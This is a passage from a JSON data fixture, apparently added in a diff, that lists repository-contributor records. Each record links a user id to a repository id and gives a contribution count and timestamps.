+{ + "model": "github.repositorycontributor", + "pk": 6195, + "fields": { + "nest_created_at": "2024-09-22T06:37:07.945Z", + "nest_updated_at": "2024-09-22T19:30:29.138Z", + "contributions_count": 2, + "repository": 1127, + "user": 5692 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6196, + "fields": { + "nest_created_at": "2024-09-22T06:37:08.265Z", + "nest_updated_at": "2024-09-22T19:30:29.451Z", + "contributions_count": 2, + "repository": 1127, + "user": 5693 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6197, + "fields": { + "nest_created_at": "2024-09-22T06:37:08.588Z", + "nest_updated_at": "2024-09-22T19:30:29.758Z", + "contributions_count": 2, + "repository": 1127, + "user": 5694 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6198, + "fields": { + "nest_created_at": "2024-09-22T06:37:08.911Z", + "nest_updated_at": "2024-09-22T19:30:30.092Z", + "contributions_count": 2, + "repository": 1127, + "user": 5020 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6199, + "fields": { + "nest_created_at": "2024-09-22T06:37:09.249Z", + "nest_updated_at": "2024-09-22T19:30:30.457Z", + "contributions_count": 2, + "repository": 1127, + "user": 484 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6200, + "fields": { + "nest_created_at": "2024-09-22T06:37:09.570Z", + "nest_updated_at": "2024-09-22T19:30:30.771Z", + "contributions_count": 2, + "repository": 1127, + "user": 513 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6201, + "fields": { + "nest_created_at": "2024-09-22T06:37:09.909Z", + "nest_updated_at": "2024-09-22T19:30:31.083Z", + "contributions_count": 2, + "repository": 1127, + "user": 5695 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6202, + "fields": { + "nest_created_at": "2024-09-22T06:37:10.240Z", + "nest_updated_at": "2024-09-22T19:30:31.392Z", + "contributions_count": 2, + "repository": 1127, + "user": 511 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6203, + "fields": { + "nest_created_at": "2024-09-22T06:37:10.567Z", + "nest_updated_at": "2024-09-22T19:30:31.722Z", + "contributions_count": 2, + "repository": 1127, + "user": 5410 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6204, + "fields": { + "nest_created_at": "2024-09-22T06:37:10.883Z", + "nest_updated_at": "2024-09-22T19:30:32.058Z", + "contributions_count": 2, + "repository": 1127, + "user": 5696 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6205, + "fields": { + "nest_created_at": "2024-09-22T06:37:11.197Z", + "nest_updated_at": "2024-09-22T19:30:32.372Z", + "contributions_count": 2, + "repository": 1127, + "user": 5697 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6206, + "fields": { + "nest_created_at": "2024-09-22T06:37:11.517Z", + "nest_updated_at": "2024-09-22T19:30:32.677Z", + "contributions_count": 2, + "repository": 1127, + "user": 5698 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6207, + "fields": { + "nest_created_at": "2024-09-22T06:37:11.842Z", + "nest_updated_at": "2024-09-22T19:30:32.994Z", + "contributions_count": 2, + "repository": 1127, + "user": 5699 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6208, + "fields": { + "nest_created_at": "2024-09-22T06:37:12.160Z", + "nest_updated_at": "2024-09-22T19:30:33.316Z", + "contributions_count": 2, + "repository": 1127, + "user": 5700 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6209, + "fields": { + "nest_created_at": "2024-09-22T06:37:12.482Z", + "nest_updated_at": "2024-09-22T19:30:33.647Z", + "contributions_count": 2, + "repository": 1127, + "user": 5701 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6210, + "fields": { + "nest_created_at": "2024-09-22T06:37:12.799Z", + "nest_updated_at": "2024-09-22T19:30:33.966Z", + "contributions_count": 2, + "repository": 1127, + "user": 5702 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6211, + "fields": { + "nest_created_at": "2024-09-22T06:37:13.119Z", + "nest_updated_at": "2024-09-22T19:30:34.271Z", + "contributions_count": 2, + "repository": 1127, + "user": 5224 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6212, + "fields": { + "nest_created_at": "2024-09-22T06:37:13.454Z", + "nest_updated_at": "2024-09-22T19:30:34.585Z", + "contributions_count": 2, + "repository": 1127, + "user": 5703 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6213, + "fields": { + "nest_created_at": "2024-09-22T06:37:13.776Z", + "nest_updated_at": "2024-09-22T19:30:34.894Z", + "contributions_count": 2, + "repository": 1127, + "user": 5704 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6214, + "fields": { + "nest_created_at": "2024-09-22T06:37:14.113Z", + "nest_updated_at": "2024-09-22T19:30:35.204Z", + "contributions_count": 2, + "repository": 1127, + "user": 5580 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6215, + "fields": { + "nest_created_at": "2024-09-22T06:37:14.430Z", + "nest_updated_at": "2024-09-22T19:30:35.532Z", + "contributions_count": 2, + "repository": 1127, + "user": 5705 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6216, + "fields": { + "nest_created_at": "2024-09-22T06:37:14.745Z", + "nest_updated_at": "2024-09-22T19:30:35.844Z", + "contributions_count": 2, + "repository": 1127, + "user": 5706 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6217, + "fields": { + "nest_created_at": "2024-09-22T06:37:15.073Z", + "nest_updated_at": "2024-09-22T19:30:36.163Z", + "contributions_count": 2, + "repository": 1127, + "user": 4807 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6218, + "fields": { + "nest_created_at": "2024-09-22T06:37:15.387Z", + "nest_updated_at": "2024-09-22T19:30:36.493Z", + "contributions_count": 2, + "repository": 1127, + "user": 5707 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6219, + "fields": { + "nest_created_at": "2024-09-22T06:37:15.703Z", + "nest_updated_at": "2024-09-22T19:30:36.826Z", + "contributions_count": 1, + "repository": 1127, + "user": 5708 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6220, + "fields": { + "nest_created_at": "2024-09-22T06:37:16.034Z", + "nest_updated_at": "2024-09-22T19:30:37.139Z", + "contributions_count": 1, + "repository": 1127, + "user": 5709 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6221, + "fields": { + "nest_created_at": "2024-09-22T06:37:16.373Z", + "nest_updated_at": "2024-09-22T19:30:37.447Z", + "contributions_count": 1, + "repository": 1127, + "user": 5710 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6222, + "fields": { + "nest_created_at": "2024-09-22T06:37:16.687Z", + "nest_updated_at": "2024-09-22T19:30:37.767Z", + "contributions_count": 1, + "repository": 1127, + "user": 5711 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6223, + "fields": { + "nest_created_at": "2024-09-22T06:37:17.010Z", + "nest_updated_at": "2024-09-22T19:30:38.076Z", + "contributions_count": 1, + "repository": 1127, + "user": 5712 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6224, + "fields": { + "nest_created_at": "2024-09-22T06:37:17.330Z", + "nest_updated_at": "2024-09-22T19:30:38.389Z", + "contributions_count": 1, + "repository": 1127, + "user": 3401 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6225, + "fields": { + "nest_created_at": "2024-09-22T06:37:17.642Z", + "nest_updated_at": "2024-09-22T19:30:38.726Z", + "contributions_count": 1, + "repository": 1127, + "user": 5713 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6226, + "fields": { + "nest_created_at": "2024-09-22T06:37:17.960Z", + "nest_updated_at": "2024-09-22T19:30:39.040Z", + "contributions_count": 1, + "repository": 1127, + "user": 5714 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6227, + "fields": { + "nest_created_at": "2024-09-22T06:37:18.293Z", + "nest_updated_at": "2024-09-22T19:30:39.355Z", + "contributions_count": 1, + "repository": 1127, + "user": 5715 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6228, + "fields": { + "nest_created_at": "2024-09-22T06:37:18.621Z", + "nest_updated_at": "2024-09-22T19:30:39.670Z", + "contributions_count": 1, + "repository": 1127, + "user": 5716 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6229, + "fields": { + "nest_created_at": "2024-09-22T06:37:18.938Z", + "nest_updated_at": "2024-09-22T19:30:39.983Z", + "contributions_count": 1, + "repository": 1127, + "user": 505 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6230, + "fields": { + "nest_created_at": "2024-09-22T06:37:19.265Z", + "nest_updated_at": "2024-09-22T19:30:40.293Z", + "contributions_count": 1, + "repository": 1127, + "user": 5717 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6231, + "fields": { + "nest_created_at": "2024-09-22T06:37:19.574Z", + "nest_updated_at": "2024-09-22T19:30:40.612Z", + "contributions_count": 1, + "repository": 1127, + "user": 5592 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6232, + "fields": { + "nest_created_at": "2024-09-22T06:37:19.884Z", + "nest_updated_at": "2024-09-22T19:30:40.934Z", + "contributions_count": 1, + "repository": 1127, + "user": 5718 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6233, + "fields": { + "nest_created_at": "2024-09-22T06:37:20.204Z", + "nest_updated_at": "2024-09-22T19:30:41.243Z", + "contributions_count": 1, + "repository": 1127, + "user": 5719 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6234, + "fields": { + "nest_created_at": "2024-09-22T06:37:20.519Z", + "nest_updated_at": "2024-09-22T19:30:41.554Z", + "contributions_count": 1, + "repository": 1127, + "user": 5720 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6235, + "fields": { + "nest_created_at": "2024-09-22T06:37:20.868Z", + "nest_updated_at": "2024-09-22T19:30:41.885Z", + "contributions_count": 1, + "repository": 1127, + "user": 5721 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6236, + "fields": { + "nest_created_at": "2024-09-22T06:37:21.185Z", + "nest_updated_at": "2024-09-22T19:30:42.196Z", + "contributions_count": 1, + "repository": 1127, + "user": 5436 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6237, + "fields": { + "nest_created_at": "2024-09-22T06:37:21.503Z", + "nest_updated_at": "2024-09-22T19:30:42.551Z", + "contributions_count": 1, + "repository": 1127, + "user": 5722 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6238, + "fields": { + "nest_created_at": "2024-09-22T06:37:21.831Z", + "nest_updated_at": "2024-09-22T19:30:42.863Z", + "contributions_count": 1, + "repository": 1127, + "user": 5723 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6239, + "fields": { + "nest_created_at": "2024-09-22T06:37:22.150Z", + "nest_updated_at": "2024-09-22T19:30:43.180Z", + "contributions_count": 1, + "repository": 1127, + "user": 5724 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6240, + "fields": { + "nest_created_at": "2024-09-22T06:37:22.462Z", + "nest_updated_at": "2024-09-22T19:30:43.503Z", + "contributions_count": 1, + "repository": 1127, + "user": 5725 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6241, + "fields": { + "nest_created_at": "2024-09-22T06:37:22.779Z", + "nest_updated_at": "2024-09-22T19:30:43.835Z", + "contributions_count": 1, + "repository": 1127, + "user": 5726 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6242, + "fields": { + "nest_created_at": "2024-09-22T06:37:23.096Z", + "nest_updated_at": "2024-09-22T19:30:44.151Z", + "contributions_count": 1, + "repository": 1127, + "user": 5727 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6243, + "fields": { + "nest_created_at": "2024-09-22T06:37:23.415Z", + "nest_updated_at": "2024-09-22T19:30:44.467Z", + "contributions_count": 1, + "repository": 1127, + "user": 5728 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6244, + "fields": { + "nest_created_at": "2024-09-22T06:37:23.727Z", + "nest_updated_at": "2024-09-22T19:30:44.776Z", + "contributions_count": 1, + "repository": 1127, + "user": 5729 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6245, + "fields": { + "nest_created_at": "2024-09-22T06:37:24.045Z", + "nest_updated_at": "2024-09-22T19:30:45.088Z", + "contributions_count": 1, + "repository": 1127, + "user": 5730 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6246, + "fields": { + "nest_created_at": "2024-09-22T06:37:24.364Z", + "nest_updated_at": "2024-09-22T19:30:45.435Z", + "contributions_count": 1, + "repository": 1127, + "user": 5731 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6247, + "fields": { + "nest_created_at": "2024-09-22T06:37:24.718Z", + "nest_updated_at": "2024-09-22T19:30:45.764Z", + "contributions_count": 1, + "repository": 1127, + "user": 5732 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6248, + "fields": { + "nest_created_at": "2024-09-22T06:37:25.079Z", + "nest_updated_at": "2024-09-22T19:30:46.082Z", + "contributions_count": 1, + "repository": 1127, + "user": 4975 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6249, + "fields": { + "nest_created_at": "2024-09-22T06:37:25.431Z", + "nest_updated_at": "2024-09-22T19:30:46.414Z", + "contributions_count": 1, + "repository": 1127, + "user": 5733 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6250, + "fields": { + "nest_created_at": "2024-09-22T06:37:25.750Z", + "nest_updated_at": "2024-09-22T19:30:46.734Z", + "contributions_count": 1, + "repository": 1127, + "user": 5734 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6251, + "fields": { + "nest_created_at": "2024-09-22T06:37:26.062Z", + "nest_updated_at": "2024-09-22T19:30:47.054Z", + "contributions_count": 1, + "repository": 1127, + "user": 5735 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6252, + "fields": { + "nest_created_at": "2024-09-22T06:37:26.380Z", + "nest_updated_at": "2024-09-22T19:30:47.368Z", + "contributions_count": 1, + "repository": 1127, + "user": 5736 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6253, + "fields": { + "nest_created_at": "2024-09-22T06:37:26.722Z", + "nest_updated_at": "2024-09-22T19:30:47.676Z", + "contributions_count": 1, + "repository": 1127, + "user": 5737 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6254, + "fields": { + "nest_created_at": "2024-09-22T06:37:27.038Z", + "nest_updated_at": "2024-09-22T19:30:47.987Z", + "contributions_count": 1, + "repository": 1127, + "user": 5738 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6255, + "fields": { + "nest_created_at": "2024-09-22T06:37:27.352Z", + "nest_updated_at": "2024-09-22T19:30:48.296Z", + "contributions_count": 1, + "repository": 1127, + "user": 5739 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6256, + "fields": { + "nest_created_at": "2024-09-22T06:37:27.676Z", + "nest_updated_at": "2024-09-22T19:30:48.607Z", + "contributions_count": 1, + "repository": 1127, + "user": 5740 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6257, + "fields": { + "nest_created_at": "2024-09-22T06:37:27.993Z", + "nest_updated_at": "2024-09-22T19:30:48.949Z", + "contributions_count": 1, + "repository": 1127, + "user": 5741 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6258, + "fields": { + "nest_created_at": "2024-09-22T06:37:28.317Z", + "nest_updated_at": "2024-09-22T19:30:49.259Z", + "contributions_count": 1, + "repository": 1127, + "user": 504 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6259, + "fields": { + "nest_created_at": "2024-09-22T06:37:28.687Z", + "nest_updated_at": "2024-09-22T19:30:49.573Z", + "contributions_count": 1, + "repository": 1127, + "user": 5742 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6260, + "fields": { + "nest_created_at": "2024-09-22T06:37:29.008Z", + "nest_updated_at": "2024-09-22T19:30:49.891Z", + "contributions_count": 1, + "repository": 1127, + "user": 5582 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6261, + "fields": { + "nest_created_at": "2024-09-22T06:37:29.361Z", + "nest_updated_at": "2024-09-22T19:30:50.204Z", + "contributions_count": 1, + "repository": 1127, + "user": 5743 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6262, + "fields": { + "nest_created_at": "2024-09-22T06:37:29.678Z", + "nest_updated_at": "2024-09-22T19:30:50.524Z", + "contributions_count": 1, + "repository": 1127, + "user": 3239 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6263, + "fields": { + "nest_created_at": "2024-09-22T06:37:30.013Z", + "nest_updated_at": "2024-09-22T19:30:50.837Z", + "contributions_count": 1, + "repository": 1127, + "user": 5744 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6264, + "fields": { + "nest_created_at": "2024-09-22T06:37:30.349Z", + "nest_updated_at": "2024-09-22T19:30:51.151Z", + "contributions_count": 1, + "repository": 1127, + "user": 5745 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6265, + "fields": { + "nest_created_at": "2024-09-22T06:37:30.691Z", + "nest_updated_at": "2024-09-22T19:30:51.464Z", + "contributions_count": 1, + "repository": 1127, + "user": 2137 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6266, + "fields": { + "nest_created_at": "2024-09-22T06:37:31.127Z", + "nest_updated_at": "2024-09-22T19:30:51.775Z", + "contributions_count": 1, + "repository": 1127, + "user": 4103 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6267, + "fields": { + "nest_created_at": "2024-09-22T06:37:31.459Z", + "nest_updated_at": "2024-09-22T19:30:52.090Z", + "contributions_count": 1, + "repository": 1127, + "user": 480 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6268, + "fields": { + "nest_created_at": "2024-09-22T06:37:31.785Z", + "nest_updated_at": "2024-09-22T19:30:52.406Z", + "contributions_count": 1, + "repository": 1127, + "user": 5746 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6269, + "fields": { + "nest_created_at": "2024-09-22T06:37:32.097Z", + "nest_updated_at": "2024-09-22T19:30:52.745Z", + "contributions_count": 1, + "repository": 1127, + "user": 5747 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6270, + "fields": { + "nest_created_at": "2024-09-22T06:37:32.420Z", + "nest_updated_at": "2024-09-22T19:30:53.057Z", + "contributions_count": 1, + "repository": 1127, + "user": 5748 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6271, + "fields": { + "nest_created_at": "2024-09-22T06:37:32.739Z", + "nest_updated_at": "2024-09-22T19:30:53.390Z", + "contributions_count": 1, + "repository": 1127, + "user": 5749 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6272, + "fields": { + "nest_created_at": "2024-09-22T06:37:33.064Z", + "nest_updated_at": "2024-09-22T19:30:53.700Z", + "contributions_count": 1, + "repository": 1127, + "user": 5750 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6273, + "fields": { + "nest_created_at": "2024-09-22T06:37:33.381Z", + "nest_updated_at": "2024-09-22T19:30:54.011Z", + "contributions_count": 1, + "repository": 1127, + "user": 5751 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6274, + "fields": { + "nest_created_at": "2024-09-22T06:37:33.721Z", + "nest_updated_at": "2024-09-22T19:30:54.328Z", + "contributions_count": 1, + "repository": 1127, + "user": 5752 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6275, + "fields": { + "nest_created_at": "2024-09-22T06:37:34.047Z", + "nest_updated_at": "2024-09-22T19:30:54.651Z", + "contributions_count": 1, + "repository": 1127, + "user": 5753 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6276, + "fields": { + "nest_created_at": "2024-09-22T06:37:34.371Z", + "nest_updated_at": "2024-09-22T19:30:54.962Z", + "contributions_count": 1, + "repository": 1127, + "user": 5754 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6277, + "fields": { + "nest_created_at": "2024-09-22T06:37:34.690Z", + "nest_updated_at": "2024-09-22T19:30:55.275Z", + "contributions_count": 1, + "repository": 1127, + "user": 5755 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6278, + "fields": { + "nest_created_at": "2024-09-22T06:37:35.019Z", + "nest_updated_at": "2024-09-22T19:30:55.584Z", + "contributions_count": 1, + "repository": 1127, + "user": 493 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6279, + "fields": { + "nest_created_at": "2024-09-22T06:37:35.330Z", + "nest_updated_at": "2024-09-22T19:30:55.896Z", + "contributions_count": 1, + "repository": 1127, + "user": 5756 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6280, + "fields": { + "nest_created_at": "2024-09-22T06:37:35.648Z", + "nest_updated_at": "2024-09-22T19:30:56.252Z", + "contributions_count": 1, + "repository": 1127, + "user": 5757 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6281, + "fields": { + "nest_created_at": "2024-09-22T06:37:35.975Z", + "nest_updated_at": "2024-09-22T19:30:56.579Z", + "contributions_count": 1, + "repository": 1127, + "user": 5758 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6282, + "fields": { + "nest_created_at": "2024-09-22T06:37:36.297Z", + "nest_updated_at": "2024-09-22T19:30:56.885Z", + "contributions_count": 1, + "repository": 1127, + "user": 5759 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6283, + "fields": { + "nest_created_at": "2024-09-22T06:37:36.633Z", + "nest_updated_at": "2024-09-22T19:30:57.206Z", + "contributions_count": 1, + "repository": 1127, + "user": 5760 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6284, + "fields": { + "nest_created_at": "2024-09-22T06:37:37.027Z", + "nest_updated_at": "2024-09-22T19:30:57.524Z", + "contributions_count": 1, + "repository": 1127, + "user": 5761 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6285, + "fields": { + "nest_created_at": "2024-09-22T06:37:37.389Z", + "nest_updated_at": "2024-09-22T19:30:57.835Z", + "contributions_count": 1, + "repository": 1127, + "user": 5762 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6286, + "fields": { + "nest_created_at": "2024-09-22T06:37:37.726Z", + "nest_updated_at": "2024-09-22T19:30:58.146Z", + "contributions_count": 1, + "repository": 1127, + "user": 5763 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6287, + "fields": { + "nest_created_at": "2024-09-22T06:37:38.045Z", + "nest_updated_at": "2024-09-22T19:30:58.464Z", + "contributions_count": 1, + "repository": 1127, + "user": 5764 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6288, + "fields": { + "nest_created_at": "2024-09-22T06:37:38.734Z", + "nest_updated_at": "2024-09-22T19:30:59.175Z", + "contributions_count": 1, + "repository": 1127, + "user": 507 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6289, + "fields": { + "nest_created_at": "2024-09-22T06:37:39.054Z", + "nest_updated_at": "2024-09-22T19:30:59.494Z", + "contributions_count": 1, + "repository": 1127, + "user": 5765 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6290, + "fields": { + "nest_created_at": "2024-09-22T06:37:39.396Z", + "nest_updated_at": "2024-09-22T19:30:59.814Z", + "contributions_count": 1, + "repository": 1127, + "user": 5766 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6291, + "fields": { + "nest_created_at": "2024-09-22T06:37:39.740Z", + "nest_updated_at": "2024-09-22T19:31:00.128Z", + "contributions_count": 1, + "repository": 1127, + "user": 5260 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6292, + "fields": { + "nest_created_at": "2024-09-22T06:37:40.054Z", + "nest_updated_at": "2024-09-22T19:31:00.452Z", + "contributions_count": 1, + "repository": 1127, + "user": 5767 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6293, + "fields": { + "nest_created_at": "2024-09-22T06:37:40.387Z", + "nest_updated_at": "2024-09-22T19:31:00.771Z", + "contributions_count": 1, + "repository": 1127, + "user": 5768 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6294, + "fields": { + "nest_created_at": "2024-09-22T06:37:40.730Z", + "nest_updated_at": "2024-09-22T19:31:01.992Z", + "contributions_count": 1, + "repository": 1127, + "user": 5769 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6295, + "fields": { + "nest_created_at": "2024-09-22T06:37:41.042Z", + "nest_updated_at": "2024-09-22T19:31:02.307Z", + "contributions_count": 1, + "repository": 1127, + "user": 510 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6296, + "fields": { + "nest_created_at": "2024-09-22T06:37:41.357Z", + "nest_updated_at": "2024-09-22T19:31:02.630Z", + "contributions_count": 1, + "repository": 1127, + "user": 5770 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6297, + "fields": { + "nest_created_at": "2024-09-22T06:37:41.674Z", + "nest_updated_at": "2024-09-22T19:31:02.958Z", + "contributions_count": 1, + "repository": 1127, + "user": 5771 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6298, + "fields": { + "nest_created_at": "2024-09-22T06:37:41.993Z", + "nest_updated_at": "2024-09-22T19:31:03.270Z", + "contributions_count": 1, + "repository": 1127, + "user": 422 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6299, + "fields": { + "nest_created_at": "2024-09-22T06:37:42.306Z", + "nest_updated_at": "2024-09-22T19:31:03.584Z", + "contributions_count": 1, + "repository": 1127, + "user": 2136 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6300, + "fields": { + "nest_created_at": "2024-09-22T06:37:42.671Z", + "nest_updated_at": "2024-09-22T19:31:03.897Z", + "contributions_count": 1, + "repository": 1127, + "user": 5772 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6301, + "fields": { + "nest_created_at": "2024-09-22T06:37:43.009Z", + "nest_updated_at": "2024-09-22T19:31:04.245Z", + "contributions_count": 1, + "repository": 1127, + "user": 491 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6302, + "fields": { + "nest_created_at": "2024-09-22T06:37:43.331Z", + "nest_updated_at": "2024-09-22T19:31:04.556Z", + "contributions_count": 1, + "repository": 1127, + "user": 487 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6303, + "fields": { + "nest_created_at": "2024-09-22T06:37:43.645Z", + "nest_updated_at": "2024-09-22T19:31:04.873Z", + "contributions_count": 1, + "repository": 1127, + "user": 5773 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6304, + "fields": { + "nest_created_at": "2024-09-22T06:37:43.992Z", + "nest_updated_at": "2024-09-22T19:31:05.183Z", + "contributions_count": 1, + "repository": 1127, + "user": 508 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6305, + "fields": { + "nest_created_at": "2024-09-22T06:37:47.636Z", + "nest_updated_at": "2024-09-22T18:24:05.207Z", + "contributions_count": 21, + "repository": 1128, + "user": 340 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6306, + "fields": { + "nest_created_at": "2024-09-22T06:37:52.479Z", + "nest_updated_at": "2024-09-22T18:24:09.984Z", + "contributions_count": 157, + "repository": 1129, + "user": 372 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6307, + "fields": { + "nest_created_at": "2024-09-22T06:37:52.851Z", + "nest_updated_at": "2024-09-22T18:24:10.294Z", + "contributions_count": 14, + "repository": 1129, + "user": 5774 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6308, + "fields": { + "nest_created_at": "2024-09-22T06:37:53.171Z", + "nest_updated_at": "2024-09-22T18:24:10.604Z", + "contributions_count": 2, + "repository": 1129, + "user": 5343 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6309, + "fields": { + "nest_created_at": "2024-09-22T06:37:53.498Z", + "nest_updated_at": "2024-09-22T18:24:10.939Z", + "contributions_count": 1, + "repository": 1129, + "user": 5775 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6310, + "fields": { + "nest_created_at": "2024-09-22T06:37:53.822Z", + "nest_updated_at": "2024-09-22T18:24:11.257Z", + "contributions_count": 1, + "repository": 1129, + "user": 340 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6311, + "fields": { + "nest_created_at": "2024-09-22T06:37:54.143Z", + "nest_updated_at": "2024-09-22T18:24:11.576Z", + "contributions_count": 1, + "repository": 1129, + "user": 2251 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6312, + "fields": { + "nest_created_at": "2024-09-22T06:37:54.459Z", + "nest_updated_at": "2024-09-22T18:24:11.884Z", + "contributions_count": 1, + "repository": 1129, + "user": 5599 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6313, + "fields": { + "nest_created_at": "2024-09-22T06:38:00.006Z", + "nest_updated_at": "2024-09-22T19:31:10.816Z", + "contributions_count": 581, + "repository": 1130, + "user": 40 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6314, + "fields": { + "nest_created_at": "2024-09-22T06:38:00.329Z", + "nest_updated_at": "2024-09-22T19:31:11.131Z", + "contributions_count": 290, + "repository": 1130, + "user": 474 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6315, + "fields": { + "nest_created_at": "2024-09-22T06:38:00.646Z", + "nest_updated_at": "2024-09-22T19:31:11.483Z", + "contributions_count": 247, + "repository": 1130, + "user": 469 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6316, + "fields": { + "nest_created_at": "2024-09-22T06:38:00.962Z", + "nest_updated_at": "2024-09-22T19:31:11.797Z", + "contributions_count": 102, + "repository": 1130, + "user": 5776 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6317, + "fields": { + "nest_created_at": "2024-09-22T06:38:01.287Z", + "nest_updated_at": "2024-09-22T19:31:12.119Z", + "contributions_count": 84, + "repository": 1130, + "user": 5777 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6318, + "fields": { + "nest_created_at": "2024-09-22T06:38:01.602Z", + "nest_updated_at": "2024-09-22T19:31:12.468Z", + "contributions_count": 81, + "repository": 1130, + "user": 477 + } +}, +{ + "model": 